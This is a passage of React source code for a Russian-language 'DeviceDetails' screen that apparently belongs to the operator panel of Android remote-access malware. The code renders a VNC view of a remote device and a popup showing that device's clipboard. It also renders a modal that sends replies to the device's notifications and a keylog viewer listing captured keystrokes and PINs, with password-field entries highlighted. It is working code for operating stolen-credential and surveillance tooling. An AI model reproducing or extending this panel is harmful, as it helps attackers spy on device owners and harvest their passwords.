                        device={internalDeviceState}

                        ws={ws}

                        onClose={handleVncClose}

                    />

                )}



                {/* ── Всплывающее окно буфера обмена ── */}

                {(clipLoading || clipboardResult) && (

                    <div style={{

                        position: 'fixed', bottom: '24px', right: '24px', zIndex: 10000,

                        background: '#0e1a2a', border: '1px solid #1e3048', borderRadius: '10px',

                        boxShadow: '0 8px 40px rgba(0,0,0,0.75)', padding: '14px 16px',

                        minWidth: '280px', maxWidth: '420px',

                        display: 'flex', flexDirection: 'column', gap: '8px',

                    }}>

                        <div style={{ display: 'flex', alignItems: 'center', justifyContent: 'space-between', gap: '10px' }}>

                            <span style={{ color: '#4a9aba', fontSize: '13px', fontWeight: '700' }}>📋 Буфер обмена</span>

                            <button

                                onClick={() => { setClipboardResult(null); setClipLoading(false); }}

                                style={{ background: 'none', border: 'none', color: '#4a6070', cursor: 'pointer', fontSize: '14px', fontWeight: '700', padding: '0 2px' }}

                            >✕</button>

                        </div>

                        {clipLoading && !clipboardResult && (

                            <div style={{ color: '#2a5060', fontSize: '12px' }}>⏳ Считывание буфера...</div>

                        )}

                        {clipboardResult && (

                            <>

                                {clipboardResult.note && (

                                    <div style={{ color: '#4a6870', fontSize: '11px' }}>{clipboardResult.note}</div>

                                )}

                                <div style={{

                                    background: '#070d18', border: '1px solid #162030', borderRadius: '6px',

                                    padding: '8px 10px', color: clipboardResult.text ? '#90caf9' : '#2a4060',

                                    fontSize: '12px', fontFamily: 'monospace', wordBreak: 'break-all',

                                    maxHeight: '120px', overflowY: 'auto',

                                }}>

                                    {clipboardResult.text || '(буфер пуст)'}

                                </div>

                                {clipboardResult.text && (

                                    <button

                                        onClick={() => { try { navigator.clipboard.writeText(clipboardResult.text); toast.success('Скопировано'); } catch(_){} }}

                                        style={{

                                            alignSelf: 'flex-end', padding: '4px 12px', borderRadius: '5px',

                                            border: '1px solid #162516', background: '#081408', color: '#5a9060',

                                            fontSize: '11px', cursor: 'pointer',

                                        }}

                                    >⎘ Скопировать</button>

                                )}

                            </>

                        )}

                    </div>

                )}



                <InputModal

                    isOpen={replyModal.isOpen}

                    title="Ответить на уведомление"

                    fields={[{ name: 'text', label: 'Ваш ответ', autoFocus: true }]}

                    onSubmit={({ text }) => {

                        setReplyModal({ isOpen: false, notificationKey: null });

                        if (text?.trim() && ws?.current) {

                            ws.current.send(JSON.stringify({

                                action: 'replyToNotification',

                                uuid: device.uuid,

                                notificationKey: replyModal.notificationKey,

                                replyText: text.trim()

                            }));

                        }

                    }}

                    onCancel={() => setReplyModal({ isOpen: false, notificationKey: null })}

                />



                {/* ── Keylog Modal ─────────────────────────────────────────── */}

                {keylogModal.open && (

                    <div

                        style={{ position: 'fixed', inset: 0, background: 'rgba(0,0,0,0.75)', zIndex: 9999, display: 'flex', alignItems: 'center', justifyContent: 'center', padding: '20px' }}

                        onClick={handleCloseKeylogModal}

                    >

                        <div

                            style={{ background: '#1a1a2e', border: '1px solid #333', borderRadius: '8px', width: '100%', maxWidth: '800px', maxHeight: '85vh', display: 'flex', flexDirection: 'column', overflow: 'hidden' }}

                            onClick={e => e.stopPropagation()}

                        >

                            {/* Header */}

                            <div style={{ padding: '14px 18px', borderBottom: '1px solid #333', display: 'flex', alignItems: 'center', justifyContent: 'space-between' }}>

                                <div>

                                    <div style={{ color: '#e0e0e0', fontWeight: 700, fontSize: '15px' }}>⌨ Логи кейлога</div>

                                    <div style={{ color: '#888', fontSize: '11px', marginTop: '2px', wordBreak: 'break-all' }}>{keylogModal.pkg}</div>

                                </div>

                                <div style={{ display: 'flex', gap: '8px' }}>

                                    <button

                                        onClick={() => handleDeleteKeylog(keylogModal.pkg)}

                                        style={{ padding: '5px 12px', background: '#6e2424', color: '#f85149', border: '1px solid #6e2424', borderRadius: '4px', cursor: 'pointer', fontSize: '12px' }}

                                    >

                                        🗑 Очистить

                                    </button>

                                    <button

                                        onClick={handleCloseKeylogModal}

                                        style={{ padding: '5px 12px', background: '#2a2a38', color: '#aaa', border: '1px solid #333', borderRadius: '4px', cursor: 'pointer', fontSize: '12px' }}

                                    >

                                        ✕ Закрыть

                                    </button>

                                </div>

                            </div>

                            {/* Entries */}

                            <div style={{ flex: 1, overflowY: 'auto', padding: '12px 16px', fontFamily: 'monospace', fontSize: '12px' }}>

                                {keylogModal.entries.length === 0 ? (

                                    <p style={{ color: '#666', textAlign: 'center', marginTop: '40px' }}>Нет записей</p>

                                ) : (

                                    keylogModal.entries.map((entry, idx) => {

                                        const time = entry.ts ? new Date(entry.ts).toLocaleString('ru-RU') : '';

                                        const isKey = entry.t === 'key' || entry.t === 'pin';

                                        const isApp = entry.t === 'app';

                                        const isAnnounce = entry.t === 'announce';

                                        const bg = idx % 2 === 0 ? '#0d1117' : 'transparent';

                                        return (

                                            <div key={idx} style={{ padding: '5px 8px', background: bg, borderRadius: '3px', marginBottom: '2px', borderLeft: isKey ? '3px solid ' + (entry.pass ? '#e74c3c' : '#3498db') : isApp ? '3px solid #27ae60' : '3px solid #666' }}>

                                                {isApp && (

                                                    <span style={{ color: '#27ae60' }}>▶ Приложение: <strong>{entry.name || entry.pkg}</strong></span>

                                                )}

                                                {(isKey || isAnnounce) && (

                                                    <span>

                                                        <span style={{ color: '#666', marginRight: '8px' }}>{time}</span>

                                                        {entry.pass && <span style={{ color: '#e74c3c', marginRight: '6px' }}>🔒</span>}

                                                        <span style={{ color: entry.pass ? '#e74c3c' : '#c9d1d9' }}>{entry.after || entry.text || ''}</span>

                                                        {entry.src && <span style={{ color: '#555', marginLeft: '8px', fontSize: '10px' }}>[{entry.src}]</span>}

                                                    </span>

                                                )}

                                                {entry.t === 'focus' && (

                                                    <span style={{ color: '#888', fontSize: '11px' }}>

                                                        <span style={{ marginRight: '8px' }}>{time}</span>

                                                        Фокус {entry.pass ? '🔒 (пароль)' : ''}

                                                    </span>

                                                )}

                                            </div>

                                        );

                                    })

                                )}

                            </div>

                            {/* Footer */}

                            <div style={{ padding: '8px 16px', borderTop: '1px solid #333', color: '#666', fontSize: '11px' }}>

                                Записей: {keylogModal.entries.length}

                            </div>

                        </div>

                    </div>

                )}

            </div>

        </div>

    );

}



export default DeviceDetails;
